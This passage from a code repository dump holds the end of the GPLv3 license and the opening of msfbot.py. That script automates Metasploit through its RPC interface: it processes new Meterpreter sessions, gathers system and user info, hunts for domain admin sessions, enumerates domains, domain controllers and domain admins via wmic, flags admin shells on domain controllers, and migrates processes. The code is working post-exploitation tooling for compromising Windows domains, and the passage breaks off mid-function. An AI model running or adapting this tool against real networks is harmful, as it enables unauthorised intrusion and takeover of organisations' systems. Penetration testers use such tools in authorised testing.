138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/msfbot.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import re
4 | import os
5 | import sys
6 | import time
7 | import signal
8 | from msfrpc.msfrpc import Msfrpc
9 | import string
10 | import random
11 | import asyncio
12 | import argparse
13 | import netifaces
14 | from IPython import embed
15 | from termcolor import colored
16 | from netaddr import IPNetwork, AddrFormatError
17 | from subprocess import Popen, PIPE, CalledProcessError
18 | from libnmap.parser import NmapParser, NmapParserException
19 |
20 | def parse_args():
21 | # Create the arguments
22 | parser = argparse.ArgumentParser()
23 | parser.add_argument("-l", "--hostlist", help="Host list file")
24 | parser.add_argument("-x", "--xml", help="Path to Nmap XML file")
25 | parser.add_argument("-p", "--password", default="123", help="Password for msfrpc")
26 | parser.add_argument("-u", "--username", default="msf", help="Username for msfrpc")
27 | parser.add_argument("--debug", action="store_true", help="Debug info")
28 | return parser.parse_args()
29 |
30 | def convert_num(num):
31 | if type(num) == int:
32 | num = str(num)
33 | elif type(num) == bytes:
34 | num = num.decode('utf8')
35 | return num
36 |
37 | # Colored terminal output
38 | def print_bad(msg, label, num):
39 | if num:
40 | print(colored('[-] ', 'red') + '{} {} '.format(label, convert_num(num)).ljust(12)+'- '+msg)
41 | else:
42 | print(colored('[-] ', 'red') + msg)
43 |
44 | def print_info(msg, label, num):
45 | if num:
46 | print(colored('[*] ', 'blue') + '{} {} '.format(label, convert_num(num)).ljust(12)+'- '+msg)
47 | else:
48 | print(colored('[*] ', 'blue') + msg)
49 |
50 | def print_good(msg, label, num):
51 | if num:
52 | print(colored('[+] ', 'green') + '{} {} '.format(label, convert_num(num)).ljust(12)+'- '+msg)
53 | else:
54 | print(colored('[+] ', 'green') + msg)
55 |
56 | def print_great(msg, label, num):
57 | if num:
58 | print(colored('[!] ', 'yellow', attrs=['bold']) + '{} {} '.format(label, convert_num(num)).ljust(12)+'- '+msg)
59 | else:
60 | print(colored('[!] ', 'yellow', attrs=['bold']) + msg)
61 |
62 | def print_debug(msg, label, num):
63 | if num:
64 | print(colored('[DEBUG] ', 'cyan') + '{} {} '.format(label, convert_num(num)).ljust(12)+'- '+msg)
65 | else:
66 | print(colored('[DEBUG] ', 'cyan') + msg)
67 |
68 | def debug_info(output, label, label_num):
69 | if args.debug:
70 | if output:
71 | for l in output.splitlines():
72 | l = l.decode('utf8')
73 | print_debug(l, label, label_num)
74 | else:
75 | print_debug('Metasploit returned None instead of output', label, label_num)
76 |
77 | def end_script():
78 | kill_tasks()
79 | raise asyncio.CancelledError
80 |
81 | def kill_tasks():
82 | print()
83 | print_info('Killing tasks then exiting', None, None)
84 | del_unchecked_hosts_files()
85 | for task in asyncio.Task.all_tasks():
86 | task.cancel()
87 |
88 | def del_unchecked_hosts_files():
89 | for f in os.listdir():
90 | if f.startswith('unchecked_hosts-') and f.endswith('.txt'):
91 | os.remove(f)
92 |
93 | def get_local_ip(iface):
94 | '''
95 | Gets the the local IP of an interface
96 | '''
97 | ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']
98 | return ip
99 |
100 | def get_iface():
101 | '''
102 | Gets the right interface for Responder
103 | '''
104 | try:
105 | iface = netifaces.gateways()['default'][netifaces.AF_INET][1]
106 | except:
107 | ifaces = []
108 | for iface in netifaces.interfaces():
109 | # list of ipv4 addrinfo dicts
110 | ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])
111 |
112 | for entry in ipv4s:
113 | addr = entry.get('addr')
114 | if not addr:
115 | continue
116 | if not (iface.startswith('lo') or addr.startswith('127.')):
117 | ifaces.append(iface)
118 |
119 | iface = ifaces[0]
120 |
121 | return iface
122 |
123 | async def run_sysinfo(client, sess_num, sess_data):
124 | # Sysinfo
125 | print_info('Getting session data', 'Session', sess_num)
126 |
127 | cmd = 'sysinfo'
128 | end_strs = [b'Meterpreter : ']
129 | api_call = 'run_single'
130 |
131 | await make_session_busy(sess_num, sess_data)
132 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
133 | make_session_not_busy(sess_num, sess_data)
134 |
135 | if err:
136 | print_bad('Session appears to be broken', 'Session', sess_num)
137 | return [b'ERROR']
138 | else:
139 | sysinfo_split = output.splitlines()
140 |
141 | return sysinfo_split
142 |
143 | async def run_getuid(client, sess_num, sess_data):
144 | # getuid
145 | cmd = 'getuid'
146 | end_strs = [b'Server username:']
147 |
148 | await make_session_busy(sess_num, sess_data)
149 | output, err = await run_session_cmd(client, sess_num, sess_data, cmd, end_strs)
150 | make_session_not_busy(sess_num, sess_data)
151 |
152 | if err:
153 | print_bad('Session appears to be dead', 'Session', sess_num)
154 | return [b'ERROR']
155 | else:
156 | user = output.split(b'Server username: ')[-1].strip().strip()
157 | sess_data[sess_num][b'user'] = user
158 | getuid = b'User : ' + user
159 | return getuid
160 |
161 | async def get_shell_info(client, sess_num, sess_data):
162 |
163 | sysinfo_split = await run_sysinfo(client, sess_num, sess_data)
164 | if sysinfo_split == [b'ERROR']:
165 | return sysinfo_split
166 |
167 | getuid = await run_getuid(client, sess_num, sess_data)
168 | if getuid == [b'ERROR']:
169 | return getuid
170 |
171 | shell_info = [getuid] + sysinfo_split
172 |
173 | return shell_info
174 |
175 | #def is_domain_joined(user_info, domain):
176 | # if user_info != b'ERROR':
177 | # info_split = user_info.split(b':')
178 | # dom_and_user = info_split[1].strip()
179 | # dom_and_user_split = dom_and_user.split(b'\\')
180 | # dom = dom_and_user_split[0].lower()
181 | # user = dom_and_user_split[1]
182 | #
183 | # if domain != b'no domain':
184 | # if dom.lower() in domain.lower():
185 | # return b'True'
186 | #
187 | # return b'False'
188 |
189 | def print_shell_data(shell_info, admin_shell, local_admin, sess_num_str):
190 | print_info('Meterpreter shell info', 'Session', int(sess_num_str))
191 | for l in shell_info:
192 | print(' '+l.decode('utf8'))
193 | msg = ''' Admin shell : {}
194 | Local admin : {}
195 | Session number : {}'''.format(
196 | admin_shell.decode('utf8'),
197 | local_admin.decode('utf8'),
198 | sess_num_str)
199 | print(msg)
200 |
201 | #async def meterpreter_sleep(sess_num, secs):
202 | # sess_data[sess_num][b'busy'] = b'True'
203 | # await asyncio.sleep(secs)
204 | # sess_data[sess_num][b'busy'] = b'False'
205 |
206 | async def sess_first_check(lock, client, sess_num, sess_data, domain_data):
207 |
208 | if b'first_check' not in sess_data[sess_num]:
209 |
210 | sess_num_str = str(sess_num)
211 | print_good('New session {} found'.format(sess_num_str), 'Session', sess_num)
212 | clear_buffer = client.call('session.meterpreter_read', [sess_num_str])
213 |
214 | # Give it time to open
215 | print_info('Waiting 5 seconds for the session to completely open', 'Session', sess_num)
216 | await asyncio.sleep(5)
217 |
218 | sess_data[sess_num][b'busy'] = b'False'
219 | sess_data[sess_num][b'first_check'] = b'False'
220 | sess_data[sess_num][b'errors'] = []
221 | sess_data[sess_num][b'session_number'] = sess_num_str.encode()
222 | ip = sess_data[sess_num][b'tunnel_peer'].split(b':')[0]
223 | ip_data = b'IP : '+ip
224 |
225 | print_good('Gathering shell info'.format(sess_num_str), 'Session', sess_num)
226 |
227 | shell_info = await get_shell_info(client, sess_num, sess_data)
228 | if shell_info == [b'ERROR']:
229 | return
230 | shell_info = [ip_data] + shell_info
231 |
232 | # Only run invoke-userhunter once unless it doesn't find any IPs
233 | if len(domain_data['high_priority_ips']) == 0:
234 | await run_userhunter(client, sess_num, sess_data, domain_data)
235 |
236 | # Get shell privileges
237 | admin_shell, local_admin = await check_privs(client, sess_num, sess_data)
238 |
239 | # # Get session domain from shell info
240 | #domain = get_domain(shell_info)
241 | #sess_data[sess_num][b'domain'] = domain
242 | #sess_data[sess_num][b'domain_joined'] = is_domain_joined(shell_info[1], domain)
243 |
244 | # Update domain_data for domain admins and domain controllers
245 | await domain_recon(lock, client, sess_num, sess_data, domain_data)
246 |
247 | # Check if it's a shell on a DC
248 | if ip.decode('utf8') in domain_data['domain_controllers'] and admin_shell == b'True':
249 | print_great('Admin shell on domain controller acquired!', 'Session', sess_num)
250 | # end_script()
251 |
252 | # Print the new shell's data
253 | print_shell_data(shell_info, admin_shell, local_admin, sess_num_str)
254 |
255 | # Migrate out of the process
256 | await run_priv_migrate(client, sess_num, sess_data)
257 |
258 | async def domain_recon(lock, client, sess_num, sess_data, domain_data):
259 |
260 | sess_num_str = str(sess_num)
261 | print_info('Performing domain recon with wmic'.format(sess_num_str), 'Session', sess_num)
262 | await make_session_busy(sess_num, sess_data)
263 | await start_shell(client, sess_num, sess_data)
264 |
265 | # Update sess_data and domain_data
266 | domains_and_DCs = await get_domains_and_DCs(lock, client, sess_num, sess_data)
267 | if domains_and_DCs:
268 | for dom in domains_and_DCs:
269 | print_info('Domain and controllers: {}'.format(dom), 'Session', sess_num)
270 | for DC in domains_and_DCs[dom]:
271 | print(' '+DC)
272 |
273 | if dom in sess_data[sess_num]:
274 | sess_data[sess_num][b'domain'].append(dom)
275 | else:
276 | sess_data[sess_num][b'domain'] = [dom]
277 | domain_data['domains'].update(domains_and_DCs)
278 |
279 | # Update master list of DCs
280 | all_DCs = await combine_DCs(lock, domain_data)
281 | domain_data['domain_controllers'] = all_DCs
282 |
283 | # Get DAs
284 | DAs = await get_domain_admins(lock, client, sess_num, sess_data, domain_data)
285 | for da in DAs:
286 | print_info('Domain admin: '+da, 'Session', sess_num)
287 | domain_data['domain_admins'] = DAs
288 |
289 | await end_shell(client, sess_num, sess_data)
290 | make_session_not_busy(sess_num, sess_data)
291 |
292 | async def combine_DCs(lock, domain_data):
293 | all_DCs = []
